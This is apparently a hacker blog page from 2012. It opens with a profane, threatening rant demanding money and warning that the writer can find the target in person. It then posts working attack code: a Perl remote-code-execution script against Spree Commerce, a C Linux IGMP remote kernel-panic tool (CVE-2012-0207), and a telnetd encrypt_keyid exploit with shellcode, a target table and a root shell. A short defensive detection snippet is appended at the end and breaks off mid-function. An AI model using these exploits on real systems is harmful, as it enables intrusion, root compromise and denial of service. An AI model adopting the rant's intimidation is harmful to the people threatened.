
JUST REMEMBER, I AINT A FUCKING CRIPPLE MOTHERFUCKER, YOU BETTER FIX THINGS VERY DAMN FAST ABOUT THAT 200 BUX WICH WA MEANT TO BE HEADED MY WAY, AND, THATS BUSINESS YOU CALL IT, TO USE ME, AS A GO BETWEEN, SO, I ASSUME YOU DONT SPEAK TO YOUR BOSSES THEN ? YOU JUST SEND IN A COFFEE BOY AND ASK HIM TO ASK THE BOSS YES / COZ YOU SAID, THATS HOW YOU DO BUSINES… AND, AS I SHOWED YOU, AND WILL KEEP SHOWING YOU, IT IS NOT HOW I DO MY BUSINESS, ASFAR AS I SEE IT, IM OWED 200BUX, AND, SURE, YOU CAN HAVE WHATEVER DEIGN YOU WERE ALREADY THINKING, OR SIMPLY, COP THE FINE, WICH IS MORE FUN FOR ME! BELIEVE ME ARSEHOLE, YOU OWN A SHITTY LITTLE INT CAFE I ALREADY TRACKED DOWN, NOW YOUR EVEN CLOSER TO ME THAN EVER…AND, YOU THINK I WONT USE YOUR CASH AGAINST YOU STUPID. WHERE YOU THINK THE PAIN IS GREEK ? EH, ITS ALWAYS IN THE PCKET.. ASK KCOPE, HE HAS NO PCOKETS THANKS TO HIS FUCKUP IN 2K9… AND STILL, WILL NEVER, EVER BE ACCPETED,EVEN IF HE MADE A REMOTE ROOT FOR EVRY OS IN EXISTANCE AND, I WILL BE SURE TO MAKE YOUR REP THE SAME BITCH.

IT IS NOT HARD AND AS I SAID, I JUST HAVE TO SHOWUP TO YOUR FUCKING *ANYWHERE* I LIKE, COZ, IT IS A PUBLIC FUCKING WORLD…AND, SPEAK NICELY TO YOU :)

HEY, I DID NOT SAY ANYTHING ABOUT BEATINGS ETC… I JUST SIMPLY MENTIONED, YOUR PRIORITYS, YOUR WANTS AND LOVES, AND, HOW EASILY THOSE, CAN BE USED AGAINST PEOPLE NOWDAYS AND ALWAYS DAYS.

[Exploitz]: Spree commerce Remote Code Execution by xd and peanuter/darpa (Sponsored by EFNET :P~~) ~ Enjoy!

Posted on 15th March 2012 in Codes, Exploits

Well, since it is only a few months old now, and, we don't agree on things like automating the scanner to *auto root* etc, BUT, we did make it so it can run with either infile (ip list) and, then th, it will kinda not be ready to make autorooting.. but, i guess this is a BIG ass bug yes..


#!/usr/bin/perl -w
# 01-21-2012
# Spreetime (r00t time) RCE exploit coded by

# xd / HaqNET (#Haxnet@EFNET) and peanuter / darpanet (#darpa@irc.darpanet.org)

##Spree Commerce Remote Code execution exploit and Options~
# greetz: to those who deserve them, all my friends
# from haxnet... the goods ones

#Greets: ac1db1tch3z <3 , all the hackerz on efnet, my channel specially, and the cool dudes and @ps in it,

#Mouse_ , Cypher- , bysin , l3th4l (smashthestack.org), Jason/zx2c4 , killerw0rm , bakO , 2Dcube , gaby, ALL

# albanian hax0rs! love yas! and evey biker around the net, hey, yea, we have some prescence here now!

#Yes ofcourse it is for money! what else would i be sittin here writin this sht for! cmon mate..

#and, even old notprix,the magician who appears, talks abit of bs, then disapears! hha :P  joking mate..

#I could not fit all the people really, there is to many, but, ofcourse the companys who help me to, Host Virtual

#Hosting 2 of my VPS, both in AWESOME EU countries where the standard is 100mbit and, it goes upto and into 400gig/s! Nice damn backbone and love the suppt.

# My affiliation there, would help you greatly: http://www.vr.org/aff.php?aff=551

#Also great box with Gtcomm: GloboTech Communications:
#www.gtcomm.net , USE Referral ID 5039 ,and basically helps me, and, you can even then be added faster, as usually are coming through a trusted/verified user,

#i dont know howmuch it really matters,but atleast shows them you have seen and, watched theyre ad or just been told, like this yes, ina  fucking exploit!

# and 3 to fahmad / server4sale ,for his help with, and donated Dedicated box, wich is a Staminus one and, rather nice, i mean, this is one NICE guy with a huge

# heart, and, i admire him.. also LordNikon, i admire also, when he would stop changing his midn that is :s

#Now, ill let you to go have some phucking phun eh?

#thx to r0x0rel for pointing out the bugz in the first copy and ofc to the rest of haxnet....cheers!

# UNITED WE STAND, AONE , WE FALL! Yes, it is not worded the right way, thats coz, i like to be owiginwal.

#On behalf of the deceased/zombies and vampires, i think usa is now ready to tackle you guys! be careful now, your trolling for brain matter!

#peace to everyone, who i have pissed off lately..and, hopefully, you guys and i can just, chat things out and be done with the ctrap..seriously, i dont need it..and,

#i usually dont like to hand out exploit code like THiS ,but, i guess why not.. it was, there anyhow..

#To ALL troops stationed in afghanistan,pakistan,wherver other mitia advantageous points, well, go home. seriously, your fighting a war you simply will NOT win.

#Sorry that, the shitty governemts, have, been so, great with this, i mean sending mentally sound mass murdereng seargents in, is not theyre best move :s

#unfortunately for those living there, thats life...and, i can nly wish, that everyone is, at peace... or, atleast stoned ok?

#Now, it is time for my injections.. ak im late...see what happens >?

# XD coz BITCH IM WORLDIWDE

use strict;
use warnings;
use IO::Socket::INET;
use Getopt::Std;
use Storable;
getopt('cfdthlg');  ## here is the options.. you CAN remove thi, and set it to JUST scan single ip or,

## add in the scanning for/per subnet..and should be easy as! Ask ZmeU ,hes pretty cool wit that stuff! (GREETZ!)
sub Usage {
print "perl $0:\n"

print "These are your Options:\n"
. "   -c Command    - Issues command with parameters ..\n"
. "   -f Filename   - Uploads file to dir ..  (/tmp by default) ..\n"
. "   -d Directory  - Specify dir to upload file to .. (/tmp by default) ..\n"
. "   -t Target     - Ip Address or Hostname/Domain\n"                          ## hence,we decided using this method.is very easy to add www-mechanize here.and maybe

##GOOD ForkManager for it,also a subnet setup,also it can scan -a/-b/-c if added in codeit..
. "   -l Load       [Load Pre-Compiled Command List using -g]\n"
. "   -g Generate   [Generate Pre-Compiled Command List]\n"
. "   -h Help\n"
. "/t/t_-*Another HaqNET / Darpanet Production*-_";
exit(0);
}

our ( $opt_c, $opt_f, $opt_d, $opt_t, $opt_h, $opt_l, $opt_g );
Usage() unless $opt_c and $opt_t or $opt_f and $opt_t or $opt_l and $opt_t or $opt_g;
#Generate Pre-Compiled Command List (ie in file put uname -a ; id) etc..
if ($opt_g) {
print "-> What would you like to name the commands file: ";
my $filename = <STDIN>;
chomp $filename;
my ($command, @command, $command2);
while () {
print "-> Enter command(s) [done to finish]: ";
my $command2;
$command2 = <STDIN>;
chomp($command2);
if ($command2 =~ /done/) {
last;
}
my $command .= $command2;
}
my $commands = {
'commands' => [ @command ],
};
store(\$commands, $filename);
exit(0);
}
#Single command issue
if ($opt_c) {
#get command from console
my $cmd   = $opt_c;
my $issue = 'cmd';
#send command to Build_Buffer
my $buffer = Build_Buffer( $issue, $cmd );
#send attack to socket
attack($issue, $buffer);
}
#Single File Upload
if ($opt_f) {
open( File, " < $opt_f " )
or die(" [-] Unable to open (ie: file.pl you just added to it): $opt_f\nError : $1 ");
my @file = <File>;
chomp @file;
foreach my $line (@file) {
my $issue = 'file';
#send line to Build_Buffer
Build_Buffer( $issue, $line );
}
}
#Stored Command List
if ($opt_l) {
my $Stored_Commands = retrieve("$opt_l");
foreach  my $line ($Stored_Commands->commands) {
my $issue = 'commands';
#send commands to Build_Buffer
Build_Buffer( $issue, $line );
}
}

sub Build_Buffer {
my ($cmd_or_file, $line) = @_;
$line =~ s/\s/\%20/;
my $payload = undef;
#design payload
if ( $cmd_or_file =~ /cmd/ ) {
my $payload =
'/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. $line
. '%60end';
}
if ( $cmd_or_file =~ /file/) {
if ( $opt_d ) {
my $directory = $opt_d;
} else {
my $directory = '/tmp/';

#my $directory2 = '/proc/self/environ/;    ## this is where id be headed ;)
}
my $directory; #annoying strict issue ;\
my $payload = '/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. 'echo%20'
. $line
. '>>'
. $directory
. "/"
. $opt_f
. "%60end";
}
if ( $cmd_or_file =~ /commands/ ) {
my $payload = '/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. $line
. '%60end';
}
my $payload_length = length($payload);
my $host = $opt_t;
#create request
my $buffer =
'POST / HTTP/1.1' . "\n" .
'Host: $host' . "\n" .
'Keep-Alive: 300' . "\n" .
'Connection: Close' . "\n" .
'Referer: XD' . "\n" .
'Cookie: sid=1; testing=1;' . "\n" .
'Content-Type: plain/text' . "\n" .
'Length: ' . $payload_length . "\n\n" .
"$payload\n\n";
#send attack to socket
if ($cmd_or_file =~ /cmd/) {
return ($buffer);
}
if ($cmd_or_file =~ /file/) {
attack($cmd_or_file, $buffer);
}
if ($cmd_or_file =~ /commands/) {
attack($cmd_or_file, $buffer);
}
}
sub attack {
my ($cmd_or_file, $buffer) = @_;
my $host = $opt_t;
print " [+] Connecting to: $host\n ";
my $sock = IO::Socket::INET->new(
Proto    => 'tcp',
PeerAddr => $host,
PeerPort => 80,
Timeout  => 15
) or die(" [-] Unable to connect to: $host\nError : $! ");
if ($sock) {
print $sock $buffer;
print " [+] Buffer sent .. running our command .. \n ";
}
if ($cmd_or_file =~ /cmd/) {
while ( my $responce = $sock ) {
print "[!+!] Reply from: $host\n ";
print $responce;
}
exit(0);
}
}

About the exploit.. there is actually a couple of them and, there is this one which can execute code nicely, on pretty much any version i think.. am sure it might be patched now, but unsure which versions/IS, and other bundled softwares that use Spree Commerce ( www.spreecommerce.com ).

We did agree (me and peanuter that is) not to make it auto root, and, this was fine with me, and him, so, for those who CAN read, it is not hard at all to port anything for this, and, peanuter did a fine job of recoding it.. i have another bug you could say, which exists on the same page of code this bug is on.. and since this is not a disclosure like normal ones, well hell… we dont have to follow ANY rules.

So what happened.. why did it happen, so that it was NOT disclosed.. ok thats easy.. i made this bug PoC about 6 months ago, i dont know if, i was ted or what… anyhow, i used to keep ownage.pastebin.com (before they stopped subdomaining it), and well, thus was born the spree.pl, in this time, a member from my efnet network channel #HaxNET had tried to run it and, there was one brace too many! well, shit on me… anyhow, i fixed it up for him, but then realised we had much more talented members than me in my channel for perl =) Thats a no brainer.. but, i was NOT expecting it to be this guy.. hehehe, but, i welcomed peanuter's suggestions, and, he was nice about things, and asked to *properly* do it.. so, it went a couple of diff versions, and, i know different attacks were tested, on my end, for multiple vulnerabilities… anyhow, i could not figure if it was or not patched, and by this time it had sat on ownage. for about months, and was very easy to see apparently :s

Anyhow, that kinda killed the chance of trying to keep it quiet.. but, before it ended up on exploitdb or some other silly archive site, id rather showcase it and, the talent which went into a small, yet, VERY nicely coded exploit. I only take credit for a little of this now, as, it did undergo some changes, and, it has multiple attack vectors, but, maybe you can poke around eh ? It aint so bad… only bit of php to re-add…

Anyhow, i like my friends, and, i like them to stay LOYAL, and, i dont see this too much nowadays.. I hope, by even releasing this to people, they can see that, even after *fights* with others, there can be full peace, and even a deeper understanding of the human psyche.

The Internet NOW, it is truly a place for geniuses, and, well, i know i am not one, but my IQ is not that of a pea, either.

hehe…anyhow, be brave and, fight the good fight!

Dont let fatassed burger eatin ppl annoy ya!~ Actually, make that, anyone… but, you know, my theme always has been, NO THUGGERY ONLINE! Still this is my belief,but, i also believe everyone has good inside them, and, this should be always looked at FIRST.

I hope, you find inner peace, just like the Dalai Lama, and then you even get to smoke weed, free! Ha! See, who said peace was bad… make a cult, get 10 wives, and shit, have a bigotting damn ghood time!’

now as for me, i have to doin-time.in , so, might not be around so much… but, i will be sure to look after those who looked after me when it was needed, and, for those who did NOT remain loyal.. well, you should really try and make peace, and stop even tensions… and, i mean this.. I mean one special person, from Usa.. and, i hope that he can understand why i am who i am, and, thats just, a damn old man on the keys! hehe im 37, not 7, so, i dont see things as clear as some younger people.. but damn, i see bad and good when i need to, and, i try always to find that good nowadays, and, yea… sure it was awhile b4 i could act or be nice to anyone.. but, now, it seems normal for me to rant on like now and feel GOOD about it, because, even if i make ONE person smile, it has made my day…

Enjoy!

XD / worldwide

[DoS]: Code of ‘Undead’ attack by KCOPE But,this seems to be REMOTE not just lan based GREAT for learning about DoS ,about Icmp/Igmp/Tcp/IP,packet sequences,and how little it takes to flaw one

Posted on 18th January 2012 in Codes, Exploits

Ill just put the str8 up crappy PoC up, which was on fdlists right, wrong, this can attack OUTSIDE the Lan or Wlan :P
So, use some thinking, maybe update this post with your OWN version for a change
Go hard… i will have a closer look when i have more time, but, i know that my exploit for windows is set up in similar fashion and this is simply because of the way igmp and icmp membership bugs read things, so, it had to be at the least 0.0.0.0, localhost would fail… as thats an ip… so, i guess, good luck!
XD

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho :P  go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./undeadattack SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr {
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
  unsigned int options1;
  unsigned int options2;
};

struct igmp_query {
        unsigned char type;
        unsigned char maxresponse;
        unsigned short csum;
        unsigned int mcast;
        char padding[40];
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
                                                                 // bugged up in_chksum wich wont make this works :)  NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;
   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }
   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }
   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

long resolve(char *);
long resolve(char *host) {
  struct hostent *hst;
  long addr;
  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);
  memcpy(&addr, hst->h_addr, hst->h_length);
  return(addr);
}

int main(int argc, char *argv[]) {
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmp_query *igmp;
  long daddr, saddr;
  int s, i=0, c, len, one=1;
  char buf[1500];
  if (argc < 3) {
    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
    printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not :P
    return(1);
  }
  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);
  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;
  ip->ihl = 7;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(sizeof(struct iphdr)+8);
  ip->id = htons(18277);
  ip->frag_off=0;
  ip->ttl = 1;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;
  ip->options1 = 0;
  ip->options2 = 0;
  igmp->type = 0x11;
  igmp->maxresponse = 0xff;
  igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 8);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  close(s);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  ip->id = htons(18278);
  ip->tot_len = sizeof(struct iphdr)+12;
  igmp->type = 0x11;
  igmp->maxresponse = 0;
  igmp->mcast=inet_addr("0.0.0.0");
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 12);
  printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  return(0);
}

telnetd-encrypt_keyid.c with ~12 targets

Posted on 8th January 2012 in Exploits

The famous ‘targets’ copy i was apparently keeping from everyone… enjoy (with targets! and even addable targets!) !

/*
 *            telnetd-encrypt_keyid.c
 *  Mon Dec 26 20:37:05 CET 2011
 *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
 *  Copyright  2011  Gonzalo J. Carracedo (BatchDrake)
 *  nighterman@painsec.com - jpenalbae@gmail.com
 *  BatchDrake@painsec.com - BatchDrake@gmail.com
*/
/*
 * Usage:
 * $ gcc exploit.c -o exploit
 * $ ./exploit 127.0.0.1 23 1
 * [<] Succes reading intial server request 3 bytes
 * [>] Telnet initial encryption mode and IV sent
 * [<] Server response: 8 bytes read
 * [>] First payload to overwrite function pointer sent
 * [<] Server response: 6 bytes read
 * [>] Second payload to triger the function pointer
 * [*] got shell?
 * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Most of the inetd impletantions have a connection limit per second
 * so you must chage this if you start getting errors reading responses
 *  - for 60 conex per min  900000
 *  - for 40 conex per min 1500000
 *  - for no limit 300000 should work
 */
#define BRUTE_TOUT 600000  // seems pretty fair on cpu ..
#define MAXKEYLEN 64-1

struct key_info {
  unsigned char keyid[MAXKEYLEN];
  unsigned char keylen[4];
  unsigned char dir[4];
  unsigned char modep[4];
  unsigned char getcrypt[4];
};
struct target_profile {
  uint32_t      skip;
  const char    *address;
  const char    *desc;
  const char    *shellcode;
};

/* Shellcode FreeBSD x86 */
const char s_bsd32[] =
   "\x31\xc0"                      // xor          %eax,%eax
   "\x50"                          // push         %eax
   "\xb0\x17"                      // mov          $0x17,%al
   "\x50"                          // push         %eax
   "\xcd\x80"                      // int          $0x80
   "\x50"                          // push         %eax
   "\x68\x6e\x2f\x73\x68"          // push         $0x68732f6e
   "\x68\x2f\x2f\x62\x69"          // push         $0x69622f2f
   "\x89\xe3"                      // mov          %esp,%ebx
   "\x50"                          // push         %eax
   "\x54"                          // push         %esp
   "\x53"                          // push         %ebx
   "\x50"                          // push         %eax
   "\xb0\x3b"                      // mov          $0x3b,%al
   "\xcd\x80";                     // int          $0x80

/* Shellcode Linux x86 */
const char s_linux32[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

/* Shellcode Linux sparc */
const char s_linuxsparc[] = "\x2d\x0b\xd8\x9a"  /* sethi %hi(0x2f626800), %l6 */
                            "\xac\x15\xa1\x6e"  /* or %l6, 0x16e, %l6         */
                            "\x2f\x0b\xdc\xda"  /* sethi %hi(0x2f736800), %l7 */
                            "\x90\x0b\x80\x0e"  /* and %sp, %sp, %o0          */
                            "\x92\x03\xa0\x08"  /* add %sp, 0x08, %o1         */
                            "\x94\x22\x80\x0a"  /* sub %o2, %o2, %o2          */
                            "\x9c\x03\xa0\x10"  /* add %sp, 0x10, %sp         */
                            "\xec\x3b\xbf\xf0"  /* std %l6, [ %sp + - 16 ]    */
                            "\xd0\x23\xbf\xf8"  /* st %o0, [ %sp + - 8 ]      */
                            "\xc0\x23\xbf\xfc"  /* clr [ %sp + -4 ]           */
                            "\x82\x10\x20\x3b"  /* mov 0x3b, %g1              */
                            "\x91\xd0\x20\x10"; /* ta 0x10                    */

/* Valid targets list */
struct target_profile targets[] = {
  {20, "\x00\x80\x05\x08", "Generic Linux i386 bruteforce", s_linux32},
  {20, "\x00\x80\x05\x08", "Generic BSD i386 bruteforce", s_bsd32},
  {20, "\x23\xcc\x05\x08", "Ubuntu GNU/Linux 10.04, Inetutils Server (i386)", s_linux32},
  {20, "\x12\xc9\x05\x08", "Ubuntu GNU/Linux 10.04, Heimdal Server (i386)", s_linux32},
  {20, "\xef\x56\x06\x08", "Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)", s_linux32},
  {20, "\x56\x9a\x05\x08", "Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)", s_linux32},
  {1,  "\x00\x03\xe7\x94", "Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)", s_linuxsparc},
  {3,  "\x00\x03\x2e\x0c", "Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)", s_linuxsparc},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.0 (i386)", s_bsd32},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.1 (i386)", s_bsd32},
  {20, "\xed\xee\x05\x08", "FreeBSD 8.2 (i386)", s_bsd32},
  {20, "\x02\xac\x05\x08", "NetBSD 5.1 (i386)", s_bsd32},
  {0, NULL, NULL, NULL}
};

/* Telnet commands */
static unsigned char tnet_init_enc[] =
        "\xff\xfa\x26\x00\x01\x01\x12\x13"
        "\x14\x15\x16\x17\x18\x19\xff\xf0";

static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
static unsigned char tnet_end_suboption[] = "\xff\xf0";

/* Check if the shellcode worked, slightly simpler than shell (int) */
static int checkmagic (int fd) {
  char got[32];
  if (write (fd, "echo foo\n", 9) < 0)
    return -1;
  if (read (fd, got, 32) <= 0)
    return -1;
  return -!strstr (got, "foo");
}

static void shell(int fd) {
    fd_set  fds;
    char    tmp[128];
    int n;
    /* check uid */
    write(fd, "id\n", 3);
    /* semi-interactive shell */
    for (;;) {
        FD_ZERO(&fds);
        FD_SET(fd, &fds);
        FD_SET(0, &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            break;
        }
        /* read from fd and write to stdout */
        if (FD_ISSET(fd, &fds)) {
            if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
                fprintf(stderr, "Goodbye..\n");
                break;
            }
            if (write(1, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
        /* read from stdin and write to fd */
        if (FD_ISSET(0, &fds)) {
            if ((n = read(0, tmp, sizeof(tmp))) < 0) {
                perror("read");
                break;
            }
            if (write(fd, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
    }
}

static int open_connection(in_addr_t dip, int dport) {
   int pconn;
   struct sockaddr_in cdata;
   struct timeval timeout;
   /* timeout.tv_sec  = _opts.timeout; */
   timeout.tv_sec  = 8;
   timeout.tv_usec = 0;
   /* Set socket options and create it */
   cdata.sin_addr.s_addr = dip;
   cdata.sin_port = htons(dport);
   cdata.sin_family = AF_INET;
   pconn = socket(AF_INET, SOCK_STREAM, 0);
   if(pconn < 0) {
   printf("Socket error: %i\n", pconn);
   printf("Err message: %s\n", strerror(errno));
   return (-1);
   }
   /* Set socket timeout */
   if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_RCVTIMEO: ");
   /* Set socket options */
   if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_SNDTIMEO: ");
   /* Make connection */
   if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0) {
   close(pconn);
   return -1;
   }
   return pconn;
}

static void usage(char *arg) {
    int x = 0;
    printf("Available Targets:\n\n");
    /* print targets */
    while(targets[x].address != NULL) {
    printf("  %2i: %s\n", x + 1, targets[x].desc);
    x++;
    }
    printf("\n");
    printf("Telnetd encrypt_keyid exploit\n");
    printf("Usage: %s [IP] [Port] [Target]\n\n", arg);
}

int attack (const char *ip, unsigned int port,unsigned char *payload, unsigned int psize, int tryshell) {
  unsigned char readbuf[256];
  int ret;
  int conn;
  /* Open the connection */
  conn = open_connection(inet_addr(ip), port);
  if (conn == -1) {
  printf("[-] Error connecting: %i\n", errno);
  return -1;
  }
  /* Read initial server request */
  ret = read(conn, readbuf, 256);
  if (ret <= 0) {
  printf ("[!] Error receiving response: %s\n", ret ? strerror (errno) : "empty response");
  close (conn);
  return -1;
  }
  printf("[<] Success reading initial server request %i bytes ..\n", ret);
  /* printf("ATTACH DEBUGGER & PRESS KEY TO CONTINUE\n"); */
  /* ret = getchar(); */
  /* Send encryption and IV */
  ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
  if (ret != sizeof(tnet_init_enc)) {
  printf("[-] Error sending init encryption: %i\n", ret);
  close (conn);
  return -1;
  }
  printf("[>] Telnet initial encryption mode and IV sent\n");
  /* Read response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response\n");
  close (conn);
  return -1;
  } else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the first payload with the overflow */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload first time\n");
  close (conn);
  return -1;
  }
  printf("[>] First payload to overwrite function pointer sent\n");
  /* Read Response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response ..\n");
  close (conn);
  return -1;
  }
  else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the payload again to trigger the overwritten function pointer */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload second time ..\n");
  close (conn);
  return -1;
  }
  printf("[>] Second payload to trigger the function pointer ..\n");
  if (tryshell) {
  /* Start the semi interactive shell */
  printf("[*] Got root?\n");
  shell(conn);
  ret = 0;
  } else {
  printf ("[*] Does this work? ");
  /* Just check if it works */
  if (checkmagic (conn) == 0) {
  printf ("YES!\n");
  printf ("Add the Target address to the targets list & recompile!\n");
  ret = 0;
  } else {
  printf ("[-] Nope, try again ..\n");
  ret = -1;
  }
  }
  close (conn);
  return ret;
}

int main(int argc, char *argv[]) {
      int offset = 0;
      int target;
      int i;
      unsigned int address;
      /* Payload Size */
      int psize = (sizeof(struct key_info) +
      sizeof(tnet_option_enc_keyid) +
      sizeof(tnet_end_suboption));
      struct key_info bad_struct;
      unsigned char payload[psize];
      if (argc != 4) {
      usage(argv[0]);
      return -1;
      }
      /* Fill the structure */
      memset(&bad_struct, 0x90, sizeof(struct key_info));
      memcpy(bad_struct.keylen,   "DEAD", 4);
      memcpy(bad_struct.dir,      "BEEF", 4);
      target = atoi(argv[3]) - 1;
      /* Target selection (reject an index outside the table; the last entry is the NULL sentinel) */
      if (target < 0 || target >= (int)(sizeof(targets) / sizeof(targets[0])) - 1) {
      usage(argv[0]);
      return -1;
      }
      struct target_profile *t;
      t = &targets[target];
      printf("Target: %s\n\n", t->desc);
      for (i = 0; !i || target < 2; i++) {
      offset = 0;
      memcpy(&bad_struct.keyid[t->skip], t->shellcode, strlen(t->shellcode));
      memcpy (&address, t->address, 4);
      address += ((i + 1) >> 1) * (t->skip - 1) * (1 - ((i & 1) << 1));
      printf ("[*] Target address: 0x%04x\n", address);
      memcpy(bad_struct.modep, &address, 4); /* Readable address */
      memcpy(bad_struct.getcrypt, &address, 4); /* Function pointer */
      /* Prepare the payload with the overflow */
      memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
      offset += sizeof(tnet_option_enc_keyid);
      memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
      offset += sizeof(bad_struct);
      memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));
      if (attack (argv[1], atoi (argv[2]), payload, psize, target >= 2) == 0)
      break;
      usleep (BRUTE_TOUT);
    }
    return 0;
}

ENJOY! The ‘pvt’ so-called version ;)
XD
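Added here as a defender-side example, not code from the post or from the exploit's authors: a check for the condition the exploit relies on, an ENCRYPT KEYID suboption whose body is longer than the 63-byte key_info buffer (MAXKEYLEN above). The telnet byte values and the limit come from the exploit; the inputs the test helper builds are constructed.

```c
#include <stddef.h>
#include <string.h>
/* Telnet protocol bytes and the ENCRYPT option / KEYID suboption from the exploit above. */
#define IAC            0xff
#define SB             0xfa
#define SE             0xf0
#define TELOPT_ENCRYPT 0x26
#define ENCRYPT_KEYID  0x07
/* MAXKEYLEN from the exploit: the vulnerable server stores at most 63 key id bytes. */
#define KEYID_LIMIT    63

/* Length of the longest ENCRYPT KEYID suboption body in buf, or -1 if there is none.
 * IAC IAC inside a suboption counts as one data byte. A suboption cut off before
 * its IAC SE is still measured, so omitting the terminator does not hide it. */
int longest_encrypt_keyid(const unsigned char *buf, size_t len)
{
    int longest = -1;
    size_t i = 0;
    while (i + 3 < len) {
        if (buf[i] != IAC || buf[i + 1] != SB) { i++; continue; }
        int is_keyid = (buf[i + 2] == TELOPT_ENCRYPT && buf[i + 3] == ENCRYPT_KEYID);
        size_t j = i + 4;
        int datalen = 0;
        while (j < len) {
            if (buf[j] != IAC) { datalen++; j++; continue; }
            if (j + 1 < len && buf[j + 1] == IAC) { datalen++; j += 2; continue; }
            break;                          /* IAC SE (or a stray IAC x) ends the body */
        }
        if (is_keyid && datalen > longest) longest = datalen;
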